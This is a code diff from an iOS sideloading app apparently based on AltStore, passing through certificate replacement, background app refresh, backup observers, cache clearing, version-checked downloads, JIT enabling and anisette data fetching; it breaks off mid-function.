+            let yesAction = UIAlertAction(title: NSLocalizedString("Yes", comment: ""), style: .default) { (action) in
+                for certificate in ourCertificates {
+                    ALTAppleAPI.shared.revoke(certificate, for: team, session: session) { (success, error) in
+                        if let error = error, !success
+                        {
+                            completionHandler(.failure(error))
+                        }
+                    }
+                }
+                requestCertificate()
+            }
+            alertController.addAction(noAction)
+            alertController.addAction(yesAction)
+            
+            DispatchQueue.main.async {
+                if self.navigationController.presentingViewController != nil
                 {
-                    completionHandler(.failure(error))
+                    self.navigationController.present(alertController, animated: true, completion: nil)
                 }
                 else
                 {
-                    requestCertificate()
+                    self.presentingViewController?.present(alertController, animated: true, completion: nil)
                 }
             }
         }
         
-        ALTAppleAPI.shared.fetchCertificates(for: team, session: session)
-        { certificates, error in
+        ALTAppleAPI.shared.fetchCertificates(for: team, session: session) { (certificates, error) in
             do
             {
                 let certificates = try Result(certificates, error).get()
@@ -615,8 +614,6 @@ private extension AuthenticationOperation
                 }
                 else
                 {
-                    // We don't have private keys for any of the certificates,
-                    // so we need to revoke one and create a new one.
                     replaceCertificate(from: certificates)
                 }
             }
@@ -629,14 +626,11 @@ private extension AuthenticationOperation
     
     func registerCurrentDevice(for team: ALTTeam, session: ALTAppleAPISession, completionHandler: @escaping (Result<ALTDevice, Error>) -> Void)
     {
-        guard let udid = Bundle.main.object(forInfoDictionaryKey: Bundle.Info.deviceID) as? String
-        else
-        {
+        guard let udid = fetch_udid()?.toString() else {
             return completionHandler(.failure(OperationError.unknownUDID))
         }
         
-        ALTAppleAPI.shared.fetchDevices(for: team, types: [.iphone, .ipad], session: session)
-        { devices, error in
+        ALTAppleAPI.shared.fetchDevices(for: team, types: [.iphone, .ipad], session: session) { (devices, error) in
             do
             {
                 let devices = try Result(devices, error).get()
@@ -647,8 +641,7 @@ private extension AuthenticationOperation
                 }
                 else
                 {
-                    ALTAppleAPI.shared.registerDevice(name: UIDevice.current.name, identifier: udid, type: .iphone, team: team, session: session)
-                    { device, error in
+                    ALTAppleAPI.shared.registerDevice(name: UIDevice.current.name, identifier: udid, type: .iphone, team: team, session: session) { (device, error) in
                         completionHandler(Result(device, error))
                     }
                 }
@@ -663,7 +656,7 @@ private extension AuthenticationOperation
     func cacheAppIDs(team: ALTTeam, session: ALTAppleAPISession, completionHandler: @escaping (Result<Void, Error>) -> Void)
     {
         let fetchAppIDsOperation = FetchAppIDsOperation(context: self.context)
-        fetchAppIDsOperation.resultHandler = { result in
+        fetchAppIDsOperation.resultHandler = { (result) in
             do
             {
                 let (_, context) = try result.get()
@@ -684,8 +677,7 @@ private extension AuthenticationOperation
     {
         guard self.shouldShowInstructions else { return completionHandler(false) }
         
-        DispatchQueue.main.async
-        {
+        DispatchQueue.main.async {
             let instructionsViewController = self.storyboard.instantiateViewController(withIdentifier: "instructionsViewController") as! InstructionsViewController
             instructionsViewController.showsBottomButton = true
             instructionsViewController.completionHandler = {
@@ -709,8 +701,7 @@ private extension AuthenticationOperation
 #if DEBUG
         completionHandler(false)
 #else
-        DispatchQueue.main.async
-        {
+        DispatchQueue.main.async {
             let context = AuthenticatedOperationContext(context: self.context)
             context.operations.removeAllObjects() // Prevent deadlock due to endless waiting on previous operations to finish.
             

AltStore/Operations/BackgroundRefreshAppsOperation.swift

@@ -11,12 +11,14 @@ import CoreData
 
 import AltStoreCore
 import EmotionalDamage
+import minimuxer
 
-enum RefreshError: LocalizedError
+typealias RefreshError = RefreshErrorCode.Error
+enum RefreshErrorCode: Int, ALTErrorEnum, CaseIterable
 {
     case noInstalledApps
     
-    var errorDescription: String? {
+    var errorFailureReason: String {
         switch self
         {
         case .noInstalledApps: return NSLocalizedString("No active apps require refreshing.", comment: "")
@@ -93,11 +95,23 @@ final class BackgroundRefreshAppsOperation: ResultOperation<[String: Result<Inst
         super.main()
         
         guard !self.installedApps.isEmpty else {
-            self.finish(.failure(RefreshError.noInstalledApps))
+            self.finish(.failure(RefreshError(.noInstalledApps)))
             return
         }
         start_em_proxy(bind_addr: Consts.Proxy.serverURL)
-        
+        target_minimuxer_address()
+        let documentsDirectory = FileManager.default.documentsDirectory.absoluteString
+        do {
+            try minimuxer.start(try String(contentsOf: FileManager.default.documentsDirectory.appendingPathComponent("\(pairingFileName)")), documentsDirectory)
+        } catch {
+            self.finish(.failure(error))
+        }
+        if #available(iOS 17, *) {
+            // TODO: iOS 17 and above have a new JIT implementation that is completely broken in SideStore :(
+        } else {
+            start_auto_mounter(documentsDirectory)
+        }
+
         self.managedObjectContext.perform {
             print("Apps to refresh:", self.installedApps.map(\.bundleIdentifier))
             
@@ -189,7 +203,7 @@ private extension BackgroundRefreshAppsOperation
             
             let content = UNMutableNotificationContent()
             
-            var shouldPresentAlert = false
+            var shouldPresentAlert = true
             
             do
             {
@@ -205,20 +219,18 @@ private extension BackgroundRefreshAppsOperation
                 content.title = NSLocalizedString("Refreshed Apps", comment: "")
                 content.body = NSLocalizedString("All apps have been refreshed.", comment: "")
             }
-            catch RefreshError.noInstalledApps
+            catch ~OperationError.Code.noWiFi, ~RefreshErrorCode.noInstalledApps
             {
                 shouldPresentAlert = false
             }
             catch
             {
                 print("Failed to refresh apps in background.", error)
-                
+
                 content.title = NSLocalizedString("Failed to Refresh Apps", comment: "")
                 content.body = error.localizedDescription
-                
-                shouldPresentAlert = false
             }
-            
+
             if shouldPresentAlert
             {
                 let trigger = UNTimeIntervalNotificationTrigger(timeInterval: delay + 1, repeats: false)

AltStore/Operations/BackupAppOperation.swift

@@ -29,6 +29,9 @@ class BackupAppOperation: ResultOperation<Void>
     private var appName: String?
     private var timeoutTimer: Timer?
     
+    private weak var applicationWillReturnObserver: NSObjectProtocol?
+    private weak var backupResponseObserver: NSObjectProtocol?
+    
     init(action: Action, context: InstallAppOperationContext)
     {
         self.action = action
@@ -43,25 +46,26 @@ class BackupAppOperation: ResultOperation<Void>
         
         do
         {
-            if let error = self.context.error
-            {
-                throw error
-            }
+            if let error = self.context.error { throw error }
             
-            guard let installedApp = self.context.installedApp, let context = installedApp.managedObjectContext else { throw OperationError.invalidParameters }
+            guard let installedApp = self.context.installedApp, let context = installedApp.managedObjectContext else {
+                throw OperationError.invalidParameters("BackupAppOperation.main: self.context.installedApp or installedApp.managedObjectContext is nil")
+            }
             context.perform {
                 do
                 {
                     let appName = installedApp.name
                     self.appName = appName
                     
-                    guard let altstoreApp = InstalledApp.fetchAltStore(in: context) else { throw OperationError.appNotFound }
+                    guard let altstoreApp = InstalledApp.fetchAltStore(in: context) else {
+                        throw OperationError.appNotFound(name: appName)
+                    }
                     let altstoreOpenURL = altstoreApp.openAppURL
-                    
+
                     var returnURLComponents = URLComponents(url: altstoreOpenURL, resolvingAgainstBaseURL: false)
                     returnURLComponents?.host = "appBackupResponse"
                     guard let returnURL = returnURLComponents?.url else { throw OperationError.openAppFailed(name: appName) }
-                    
+
                     var openURLComponents = URLComponents()
                     openURLComponents.scheme = installedApp.openAppURL.scheme
                     openURLComponents.host = self.action.rawValue
@@ -153,8 +157,11 @@ private extension BackupAppOperation
 {
     func registerObservers()
     {
-        var applicationWillReturnObserver: NSObjectProtocol!
-        applicationWillReturnObserver = NotificationCenter.default.addObserver(forName: UIApplication.willEnterForegroundNotification, object: nil, queue: .main) { [weak self] (notification) in
+        self.applicationWillReturnObserver = NotificationCenter.default.addObserver(forName: UIApplication.willEnterForegroundNotification, object: nil, queue: .main) { [weak self] (notification) in
+            defer {
+                self?.applicationWillReturnObserver.map { NotificationCenter.default.removeObserver($0) }
+            }
+
             guard let self = self, !self.isFinished else { return }
             
             self.timeoutTimer = Timer.scheduledTimer(withTimeInterval: 5, repeats: false) { [weak self] (timer) in
@@ -166,18 +173,17 @@ private extension BackupAppOperation
                     self.finish(.failure(OperationError.timedOut))
                 }
             }
-            
-            NotificationCenter.default.removeObserver(applicationWillReturnObserver!)
         }
         
-        var backupResponseObserver: NSObjectProtocol!
-        backupResponseObserver = NotificationCenter.default.addObserver(forName: AppDelegate.appBackupDidFinish, object: nil, queue: nil) { [weak self] (notification) in
+        self.backupResponseObserver = NotificationCenter.default.addObserver(forName: AppDelegate.appBackupDidFinish, object: nil, queue: nil) { [weak self] (notification) in
+            defer {
+                self?.backupResponseObserver.map { NotificationCenter.default.removeObserver($0) }
+            }
+            
             self?.timeoutTimer?.invalidate()
             
             let result = notification.userInfo?[AppDelegate.appBackupResultKey] as? Result<Void, Error> ?? .failure(OperationError.unknownResult)
             self?.finish(result)
-            
-            NotificationCenter.default.removeObserver(backupResponseObserver!)
         }
     }
 }

AltStore/Operations/ClearAppCacheOperation.swift

@@ -0,0 +1,208 @@
+//
+//  ClearAppCacheOperation.swift
+//  AltStore
+//
+//  Created by Riley Testut on 9/27/22.
+//  Copyright © 2022 Riley Testut. All rights reserved.
+//
+
+import Foundation
+import AltStoreCore
+/*
+struct BatchError: ALTLocalizedError
+{
+
+    enum Code: Int, ALTErrorCode
+    {
+        typealias Error = BatchError
+        
+        case batchError
+    }
+
+    var code: Code = .batchError
+    var underlyingErrors: [Error]
+    
+    var errorTitle: String?
+    var errorFailure: String?
+    
+    init(errors: [Error])
+    {
+        self.underlyingErrors = errors
+    }
+    
+    var errorFailureReason: String {
+        guard !self.underlyingErrors.isEmpty else { return NSLocalizedString("An unknown error occured.", comment: "") }
+        
+        let errorMessages = self.underlyingErrors.map { $0.localizedDescription }
+        
+        let message = errorMessages.joined(separator: "\n\n")
+        return message
+    }
+}
+*/
+@objc(ClearAppCacheOperation)
+class ClearAppCacheOperation: ResultOperation<Void>
+{
+    private let coordinator = NSFileCoordinator()
+    private let coordinatorQueue = OperationQueue()
+    
+    override init()
+    {
+        self.coordinatorQueue.name = "AltStore - ClearAppCacheOperation Queue"
+    }
+    
+    override func main()
+    {
+        super.main()
+        
+        var allErrors = [Error]()
+        
+        self.clearTemporaryDirectory { result in
+            switch result
+            {
+            //case .failure(let batchError as BatchError): allErrors.append(contentsOf: batchError.underlyingErrors)
+            case .failure(let error): allErrors.append(error)
+            case .success: break
+            }
+            
+            self.removeUninstalledAppBackupDirectories { result in
+                switch result
+                {
+                //case .failure(let batchError as BatchError): allErrors.append(contentsOf: batchError.underlyingErrors)
+                case .failure(let error): allErrors.append(error)
+                case .success: break
+                }
+                
+                if allErrors.isEmpty
+                {
+                    self.finish(.success(()))
+                }
+                else
+                {
+                    self.finish(.failure(OperationError.cacheClearError(errors: allErrors.map({ error in
+                        return error.localizedDescription
+                    }))))
+                }
+            }
+        }
+    }
+}
+
+private extension ClearAppCacheOperation
+{
+    func clearTemporaryDirectory(completion: @escaping (Result<Void, Error>) -> Void)
+    {
+        let intent = NSFileAccessIntent.writingIntent(with: FileManager.default.temporaryDirectory, options: [.forDeleting])
+        self.coordinator.coordinate(with: [intent], queue: self.coordinatorQueue) { (error) in
+            do
+            {
+                if let error
+                {
+                    throw error
+                }
+                
+                let fileURLs = try FileManager.default.contentsOfDirectory(at: intent.url,
+                                                                           includingPropertiesForKeys: [],
+                                                                           options: [.skipsSubdirectoryDescendants, .skipsHiddenFiles])
+                var errors = [Error]()
+                
+                for fileURL in fileURLs
+                {
+                    do
+                    {
+                        print("[ALTLog] Removing item from temporary directory:", fileURL.lastPathComponent)
+                        try FileManager.default.removeItem(at: fileURL)
+                    }
+                    catch
+                    {
+                        print("[ALTLog] Failed to remove \(fileURL.lastPathComponent) from temporary directory.", error)
+                        errors.append(error)
+                    }
+                }
+                
+                if !errors.isEmpty
+                {
+                    completion(.failure(OperationError.cacheClearError(errors: errors.map({ error in
+                        return error.localizedDescription
+                    }))))
+                }
+                else
+                {
+                    completion(.success(()))
+                }
+            }
+            catch
+            {
+                completion(.failure(error))
+            }
+        }
+    }
+    
+    func removeUninstalledAppBackupDirectories(completion: @escaping (Result<Void, Error>) -> Void)
+    {
+        guard let backupsDirectory = FileManager.default.appBackupsDirectory else { return completion(.failure(OperationError.missingAppGroup)) }
+        
+        DatabaseManager.shared.persistentContainer.performBackgroundTask { context in
+            let installedAppBundleIDs = Set(InstalledApp.all(in: context).map { $0.bundleIdentifier })
+            
+            let intent = NSFileAccessIntent.writingIntent(with: backupsDirectory, options: [.forDeleting])
+            self.coordinator.coordinate(with: [intent], queue: self.coordinatorQueue) { (error) in
+                do
+                {
+                    if let error
+                    {
+                        throw error
+                    }
+                    
+                    var isDirectory: ObjCBool = false
+                    guard FileManager.default.fileExists(atPath: intent.url.path, isDirectory: &isDirectory), isDirectory.boolValue else {
+                        completion(.success(()))
+                        return
+                    }
+                    
+                    let fileURLs = try FileManager.default.contentsOfDirectory(at: intent.url,
+                                                                               includingPropertiesForKeys: [.isDirectoryKey, .nameKey],
+                                                                               options: [.skipsSubdirectoryDescendants, .skipsHiddenFiles])
+                    var errors = [Error]()
+                    
+                    
+                    for backupDirectory in fileURLs
+                    {
+                        do
+                        {
+                            let resourceValues = try backupDirectory.resourceValues(forKeys: [.isDirectoryKey, .nameKey])
+                            guard let isDirectory = resourceValues.isDirectory, let bundleID = resourceValues.name else { continue }
+
+                            if isDirectory && !installedAppBundleIDs.contains(bundleID) && !AppManager.shared.isActivelyManagingApp(withBundleID: bundleID)
+                            {
+                                print("[ALTLog] Removing backup directory for uninstalled app:", bundleID)
+                                try FileManager.default.removeItem(at: backupDirectory)
+                            }
+                        }
+                        catch
+                        {
+                            print("[ALTLog] Failed to remove app backup directory:", error)
+                            errors.append(error)
+                        }
+                    }
+                    
+                    if !errors.isEmpty
+                    {
+                        completion(.failure(OperationError.cacheClearError(errors: errors.map({ error in
+                            return error.localizedDescription
+                        }))))
+                    }
+                    else
+                    {
+                        completion(.success(()))
+                    }
+                }
+                catch
+                {
+                    print("[ALTLog] Failed to remove app backup directory:", error)
+                    completion(.failure(error))
+                }
+            }
+        }
+    }
+}

AltStore/Operations/DeactivateAppOperation.swift

@@ -31,11 +31,7 @@ final class DeactivateAppOperation: ResultOperation<InstalledApp>
     {
         super.main()
         
-        if let error = self.context.error
-        {
-            self.finish(.failure(error))
-            return
-        }
+        if let error = self.context.error { return self.finish(.failure(error)) }
         
         DatabaseManager.shared.persistentContainer.performBackgroundTask { (context) in
             let installedApp = context.object(with: self.app.objectID) as! InstalledApp
@@ -44,20 +40,15 @@ final class DeactivateAppOperation: ResultOperation<InstalledApp>
             
             for profile in allIdentifiers {
                 do {
-                    let res = try remove_provisioning_profile(id: profile)
-                    if case Uhoh.Bad(let code) = res {
-                        self.finish(.failure(minimuxer_to_operation(code: code)))
-                    }
-                } catch Uhoh.Bad(let code) {
-                    self.finish(.failure(minimuxer_to_operation(code: code)))
+                    try remove_provisioning_profile(profile)
+                    self.progress.completedUnitCount += 1
+                    installedApp.isActive = false
+                    self.finish(.success(installedApp))
+                    break
                 } catch {
-                    self.finish(.failure(ALTServerError(.unknownResponse)))
+                    self.finish(.failure(error))
                 }
             }
-            
-            self.progress.completedUnitCount += 1
-            installedApp.isActive = false
-            self.finish(.success(installedApp))
         }
     }
 }

AltStore/Operations/DownloadAppOperation.swift

@@ -12,66 +12,110 @@ import Roxas
 import AltStoreCore
 import AltSign
 
-private extension DownloadAppOperation
-{
-    struct DependencyError: ALTLocalizedError
-    {
-        let dependency: Dependency
-        let error: Error
-        
-        var failure: String? {
-            return String(format: NSLocalizedString("Could not download “%@”.", comment: ""), self.dependency.preferredFilename)
-        }
-        
-        var underlyingError: Error? {
-            return self.error
-        }
-    }
-}
-
 @objc(DownloadAppOperation)
 final class DownloadAppOperation: ResultOperation<ALTApplication>
 {
     let app: AppProtocol
     let context: AppOperationContext
-    
+
+    private let appName: String
     private let bundleIdentifier: String
     private var sourceURL: URL?
     private let destinationURL: URL
-    
+
     private let session = URLSession(configuration: .default)
     private let temporaryDirectory = FileManager.default.uniqueTemporaryURL()
-    
+
     init(app: AppProtocol, destinationURL: URL, context: AppOperationContext)
     {
         self.app = app
         self.context = context
-        
+
+        self.appName = app.name
         self.bundleIdentifier = app.bundleIdentifier
         self.sourceURL = app.url
         self.destinationURL = destinationURL
-        
+
         super.init()
-        
+
         // App = 3, Dependencies = 1
         self.progress.totalUnitCount = 4
     }
-    
+
     override func main()
     {
         super.main()
-        
+
         if let error = self.context.error
         {
             self.finish(.failure(error))
             return
         }
-        
+
         print("Downloading App:", self.bundleIdentifier)
-        
-        guard let sourceURL = self.sourceURL else { return self.finish(.failure(OperationError.appNotFound)) }
-        
-        self.downloadApp(from: sourceURL) { result in
+
+        self.localizedFailure = String(format: NSLocalizedString("%@ could not be downloaded.", comment: ""), self.appName)
+
+        guard let storeApp = self.app as? StoreApp else { return self.download(self.app) }
+        storeApp.managedObjectContext?.perform {
+            do {
+                let latestVersion = try self.verify(storeApp)
+                self.download(latestVersion)
+            } catch let error as VerificationError where error.code == .iOSVersionNotSupported {
+                guard let presentingViewController = self.context.presentingViewController,
+                      let latestSupportedVersion = storeApp.latestSupportedVersion,
+                      case let version = latestSupportedVersion.version,
+                      version != storeApp.installedApp?.version else {
+                    return self.finish(.failure(error))
+                }
+                let title = NSLocalizedString("Unsupported iOS Version", comment: "")
+                let message = error.localizedDescription + "\n\n" + NSLocalizedString("Would you like to download the last version compatible with this device instead?", comment: "")
+
+                DispatchQueue.main.async {
+                    let alertController = UIAlertController(title: title, message: message, preferredStyle: .alert)
+                    alertController.addAction(UIAlertAction(title: UIAlertAction.cancel.title, style: UIAlertAction.cancel.style) { _ in
+                        self.finish(.failure(OperationError.cancelled))
+                    })
+                    alertController.addAction(UIAlertAction(title: String(format: NSLocalizedString("Download %@ %@", comment: ""), self.appName, version), style: .default) { _ in
+                        self.download(latestSupportedVersion)
+                    })
+                    presentingViewController.present(alertController, animated: true)
+                }
+            } catch {
+                self.finish(.failure(error))
+            }
+        }
+    }
+
+    override func finish(_ result: Result<ALTApplication, any Error>) {
+        do {
+            try FileManager.default.removeItem(at: self.temporaryDirectory)
+        } catch {
+            print("Failed to remove DownloadAppOperation temporary directory: \(self.temporaryDirectory).", error)
+        }
+        super.finish(result)
+    }
+}
+
+private extension DownloadAppOperation {
+    func verify(_ storeApp: StoreApp) throws -> AppVersion {
+        guard let version = storeApp.latestAvailableVersion else {
+            let failureReason = String(format: NSLocalizedString("The latest version of %@ could not be determined.", comment: ""), self.appName)
+            throw OperationError.unknown(failureReason: failureReason)
+        }
+        if let minOSVersion = version.minOSVersion, !ProcessInfo.processInfo.isOperatingSystemAtLeast(minOSVersion) {
+            throw VerificationError.iOSVersionNotSupported(app: storeApp, requiredOSVersion: minOSVersion)
+        } else if let maxOSVersion = version.maxOSVersion, ProcessInfo.processInfo.operatingSystemVersion > maxOSVersion {
+            throw VerificationError.iOSVersionNotSupported(app: storeApp, requiredOSVersion: maxOSVersion)
+        }
+
+        return version
+    }
+
+    func download(@Managed _ app: AppProtocol) {
+        guard let sourceURL = self.sourceURL else { return self.finish(.failure(OperationError.appNotFound(name: self.appName))) }
+
+        self.downloadIPA(from: sourceURL) { result in
             do
             {
                 let application = try result.get()
@@ -112,24 +156,7 @@ final class DownloadAppOperation: ResultOperation<ALTApplication>
         }
     }
     
-    override func finish(_ result: Result<ALTApplication, Error>)
-    {
-        do
-        {
-            try FileManager.default.removeItem(at: self.temporaryDirectory)
-        }
-        catch
-        {
-            print("Failed to remove DownloadAppOperation temporary directory: \(self.temporaryDirectory).", error)
-        }
-        
-        super.finish(result)
-    }
-}
-
-private extension DownloadAppOperation
-{
-    func downloadApp(from sourceURL: URL, completionHandler: @escaping (Result<ALTApplication, Error>) -> Void)
+    func downloadIPA(from sourceURL: URL, completionHandler: @escaping (Result<ALTApplication, Error>) -> Void)
     {
         func finishOperation(_ result: Result<URL, Error>)
         {
@@ -138,8 +165,8 @@ private extension DownloadAppOperation
                 let fileURL = try result.get()
                 
                 var isDirectory: ObjCBool = false
-                guard FileManager.default.fileExists(atPath: fileURL.path, isDirectory: &isDirectory) else { throw OperationError.appNotFound }
-                
+                guard FileManager.default.fileExists(atPath: fileURL.path, isDirectory: &isDirectory) else { throw OperationError.appNotFound(name: self.appName) }
+
                 try FileManager.default.createDirectory(at: self.temporaryDirectory, withIntermediateDirectories: true, attributes: nil)
                 
                 let appBundleURL: URL
@@ -178,6 +205,9 @@ private extension DownloadAppOperation
             let downloadTask = self.session.downloadTask(with: sourceURL) { (fileURL, response, error) in
                 do
                 {
+                    if let response = response as? HTTPURLResponse {
+                        guard response.statusCode != 404 else { throw CocoaError(.fileNoSuchFile, userInfo: [NSURLErrorKey: sourceURL]) }
+                    }
                     let (fileURL, _) = try Result((fileURL, response), error).get()
                     finishOperation(.success(fileURL))
                     
@@ -252,7 +282,7 @@ private extension DownloadAppOperation
             let altstorePlist = try PropertyListDecoder().decode(AltStorePlist.self, from: data)
                         
             var dependencyURLs = Set<URL>()
-            var dependencyError: DependencyError?
+            var dependencyError: Error?
             
             let dispatchGroup = DispatchGroup()
             let progress = Progress(totalUnitCount: Int64(altstorePlist.dependencies.count), parent: self.progress, pendingUnitCount: 1)
@@ -285,7 +315,7 @@ private extension DownloadAppOperation
         }
         catch let error as DecodingError
         {
-            let nsError = (error as NSError).withLocalizedFailure(String(format: NSLocalizedString("Could not download dependencies for %@.", comment: ""), application.name))
+            let nsError = (error as NSError).withLocalizedFailure(String(format: NSLocalizedString("Could not determine dependencies for %@.", comment: ""), application.name))
             completionHandler(.failure(nsError))
         }
         catch
@@ -294,7 +324,7 @@ private extension DownloadAppOperation
         }
     }
     
-    func download(_ dependency: Dependency, for application: ALTApplication, progress: Progress, completionHandler: @escaping (Result<URL, DependencyError>) -> Void)
+    func download(_ dependency: Dependency, for application: ALTApplication, progress: Progress, completionHandler: @escaping (Result<URL, Error>) -> Void)
     {
         let downloadTask = self.session.downloadTask(with: dependency.downloadURL) { (fileURL, response, error) in
             do
@@ -315,9 +345,10 @@ private extension DownloadAppOperation
                 
                 completionHandler(.success(destinationURL))
             }
-            catch
+            catch let error as NSError
             {
-                completionHandler(.failure(DependencyError(dependency: dependency, error: error)))
+                let localizedFailure = String(format: NSLocalizedString("The dependency '%@' could not be downloaded.", comment: ""), dependency.preferredFilename)
+                completionHandler(.failure(error.withLocalizedFailure(localizedFailure)))
             }
         }
         progress.addChild(downloadTask.progress, withPendingUnitCount: 1)

AltStore/Operations/EnableJITOperation.swift

@@ -9,9 +9,17 @@
 import UIKit
 import Combine
 import minimuxer
+import UniformTypeIdentifiers
 
 import AltStoreCore
 
+enum SideJITServerErrorType: Error {
+     case invalidURL
+     case errorConnecting
+     case deviceNotFound
+     case other(String)
+ }
+
 @available(iOS 14, *)
 protocol EnableJITContext
 {
@@ -42,26 +50,108 @@ final class EnableJITOperation<Context: EnableJITContext>: ResultOperation<Void>
             return
         }
         
-        guard let installedApp = self.context.installedApp else { return self.finish(.failure(OperationError.invalidParameters)) }
-        
-        installedApp.managedObjectContext?.perform {
-            let v = minimuxer_to_operation(code: 1)
-                        
-            do {
-                var x = try debug_app(app_id: installedApp.resignedBundleIdentifier)
-                switch x {
-                case .Good:
-                    self.finish(.success(()))
-                case .Bad(let code):
-                    self.finish(.failure(minimuxer_to_operation(code: code)))
+        guard let installedApp = self.context.installedApp else {
+            return self.finish(.failure(OperationError.invalidParameters("EnableJITOperation.main: self.context.installedApp is nil")))
+        }
+        if #available(iOS 17, *) {
+            let sideJITenabled = UserDefaults.standard.sidejitenable
+            let SideJITIP = UserDefaults.standard.textInputSideJITServerurl ?? ""
+            
+            if sideJITenabled {
+                installedApp.managedObjectContext?.perform {
+                    EnableJITSideJITServer(serverurl: SideJITIP, installedapp: installedApp) { result in
+                        switch result {
+                        case .failure(let error):
+                            switch error {
+                            case .invalidURL, .errorConnecting:
+                                self.finish(.failure(OperationError.unableToConnectSideJIT))
+                            case .deviceNotFound:
+                                self.finish(.failure(OperationError.unableToRespondSideJITDevice))
+                            case .other(let message):
+                                if let startRange = message.range(of: "<p>"),
+                                   let endRange = message.range(of: "</p>", range: startRange.upperBound..<message.endIndex) {
+                                    let pContent = message[startRange.upperBound..<endRange.lowerBound]
+                                    self.finish(.failure(OperationError.SideJITIssue(error: String(pContent))))
+                                    print(message + " + " + String(pContent))
+                                } else {
+                                    print(message)
+                                    self.finish(.failure(OperationError.SideJITIssue(error: message)))
+                                }
+                            }
+                        case .success():
+                            self.finish(.success(()))
+                            print("Thank you for using this, it was made by Stossy11 and tested by trolley or sniper1239408")
+                        }
+                    }
+                    return
+                }
+            }
+      } else {
+            installedApp.managedObjectContext?.perform {
+                var retries = 3
+                while (retries > 0){
+                    do {
+                        try debug_app(installedApp.resignedBundleIdentifier)
+                        self.finish(.success(()))
+                        retries = 0
+                    } catch {
+                        retries -= 1
+                        if (retries <= 0){
+                            self.finish(.failure(error))
+                        }
+                    }
                 }
-            } catch Uhoh.Bad(let code) {
-                self.finish(.failure(minimuxer_to_operation(code: code)))
-            } catch {
-                self.finish(.failure(OperationError.unknown))
             }
-            
-            
         }
     }
 }
+
+@available(iOS 17, *)
+func EnableJITSideJITServer(serverurl: String, installedapp: InstalledApp, completion: @escaping (Result<Void, SideJITServerErrorType>) -> Void) {
+    guard let udid = fetch_udid()?.toString() else {
+        completion(.failure(.other("Unable to get UDID")))
+        return
+    }
+    
+    var SJSURL = serverurl
+    
+     if (UserDefaults.standard.textInputSideJITServerurl ?? "").isEmpty {
+      SJSURL = "http://sidejitserver._http._tcp.local:8080"
+     }
+    
+    if !SJSURL.hasPrefix("http") {
+        completion(.failure(.invalidURL))
+        return
+    }
+    
+    let fullurl = SJSURL + "/\(udid)/" + installedapp.resignedBundleIdentifier
+    
+    let url = URL(string: fullurl)!
+    
+    let task = URLSession.shared.dataTask(with: url) {(data, response, error) in
+        if let error = error {
+            completion(.failure(.errorConnecting))
+            return
+        }
+        
+        guard let data = data, let datastring = String(data: data, encoding: .utf8) else { return }
+        
+        if datastring == "Enabled JIT for '\(installedapp.name)'!" {
+            let content = UNMutableNotificationContent()
+            content.title = "JIT Successfully Enabled"
+            content.subtitle = "JIT Enabled For \(installedapp.name)"
+            content.sound = UNNotificationSound.default
+
+            let trigger = UNTimeIntervalNotificationTrigger(timeInterval: 0.1, repeats: false)
+            let request = UNNotificationRequest(identifier: "EnabledJIT", content: content, trigger: nil)
+
+            UNUserNotificationCenter.current().add(request)
+            completion(.success(()))
+        } else {
+            let errorType: SideJITServerErrorType = datastring == "Could not find device!" ? .deviceNotFound : .other(datastring)
+            completion(.failure(errorType))
+        }
+    }
+    
+    task.resume()
+}

AltStore/Operations/FetchAnisetteDataOperation.swift

@@ -7,15 +7,28 @@
 //
 
 import Foundation
+import CommonCrypto
+import Starscream
 
 import AltStoreCore
 import AltSign
 import Roxas
 
 @objc(FetchAnisetteDataOperation)
-final class FetchAnisetteDataOperation: ResultOperation<ALTAnisetteData>
+final class FetchAnisetteDataOperation: ResultOperation<ALTAnisetteData>, WebSocketDelegate
 {
     let context: OperationContext
+    var socket: WebSocket!
+    
+    var url: URL?
+    var startProvisioningURL: URL?
+    var endProvisioningURL: URL?
+    
+    var clientInfo: String?
+    var userAgent: String?
+    
+    var mdLu: String?
+    var deviceId: String?
     
     init(context: OperationContext)
     {
@@ -32,32 +45,413 @@ final class FetchAnisetteDataOperation: ResultOperation<ALTAnisetteData>
             return
         }
         
-        let url = AnisetteManager.currentURL
-        DLOG("Anisette URL: %@", url.absoluteString)
+        self.url = URL(string: UserDefaults.standard.menuAnisetteURL)
+        print("Anisette URL: \(self.url!.absoluteString)")
         
-        let task = URLSession.shared.dataTask(with: url) { data, response, error in
-            guard let data = data, error == nil else { return }
-            
-            do {
-                // make sure this JSON is in the format we expect
-                // convert data to json
-                if let json = try JSONSerialization.jsonObject(with: data, options: []) as? [String: String] {
-                    // try to read out a dictionary
-                    //for some reason serial number isn't needed but it doesn't work unless it has a value
-                    let formattedJSON: [String: String] = ["machineID": json["X-Apple-I-MD-M"]!, "oneTimePassword": json["X-Apple-I-MD"]!, "localUserID": json["X-Apple-I-MD-LU"]!, "routingInfo": json["X-Apple-I-MD-RINFO"]!, "deviceUniqueIdentifier": json["X-Mme-Device-Id"]!, "deviceDescription": json["X-MMe-Client-Info"]!, "date": json["X-Apple-I-Client-Time"]!, "locale": json["X-Apple-Locale"]!, "timeZone": json["X-Apple-I-TimeZone"]!, "deviceSerialNumber": "1"]
-                    
-                    if let anisette = ALTAnisetteData(json: formattedJSON) {
-                        DLOG("Anisette used: %@", formattedJSON)
-                        self.finish(.success(anisette))
-                    }
+        if let identifier = Keychain.shared.identifier,
+           let adiPb = Keychain.shared.adiPb {
+            fetchAnisetteV3(identifier, adiPb)
+        } else {
+            provision()
+        }
+    }
+    
+    // MARK: - COMMON
+    
+    func extractAnisetteData(_ data: Data, _ response: HTTPURLResponse?, v3: Bool) throws {
+        // make sure this JSON is in the format we expect
+        // convert data to json
+        if let json = try JSONSerialization.jsonObject(with: data, options: []) as? [String: String] {
+            if v3 {
+                if json["result"] == "GetHeadersError" {
+                    let message = json["message"]
+                    print("Error getting V3 headers: \(message ?? "no message")")
+                    if let message = message,
+                       message.contains("-45061") {
+                        print("Error message contains -45061 (not provisioned), resetting adi.pb and retrying")
+                        Keychain.shared.adiPb = nil
+                        return provision()
+                    } else { throw OperationError.anisetteV3Error(message: message ?? "Unknown error") }
                 }
+            }
+            
+            // try to read out a dictionary
+            // for some reason serial number isn't needed but it doesn't work unless it has a value
+            var formattedJSON: [String: String] = ["deviceSerialNumber": "0"]
+            if let machineID = json["X-Apple-I-MD-M"] { formattedJSON["machineID"] = machineID }
+            if let oneTimePassword = json["X-Apple-I-MD"] { formattedJSON["oneTimePassword"] = oneTimePassword }
+            if let routingInfo = json["X-Apple-I-MD-RINFO"] { formattedJSON["routingInfo"] = routingInfo }
+            
+            if v3 {
+                formattedJSON["deviceDescription"] = self.clientInfo!
